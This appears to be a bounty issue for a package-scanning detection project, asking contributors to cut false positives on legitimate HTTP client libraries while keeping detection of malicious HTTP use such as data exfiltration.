Reduce false positives on legitimate HTTP clients #2
Description
Bounty: Reduce false positives on legitimate HTTP clients
Reward: 500 $ISNAD
Track: Detection
Difficulty: Medium
Description
Improve detection accuracy by reducing false positives triggered by legitimate HTTP client libraries (axios, node-fetch, requests, urllib3). Current rules sometimes flag normal API usage patterns.
Requirements
- Audit current rules for HTTP client false positives
- Create allowlist patterns for common legitimate usage
- Add context-aware detection (distinguish data exfil from normal requests)
- Benchmark against top 500 npm and PyPI packages
- Maintain detection rate for actual malicious HTTP usage
- Tests passing
How to Submit
Open a PR referencing this issue. See Bounty Program for full rules.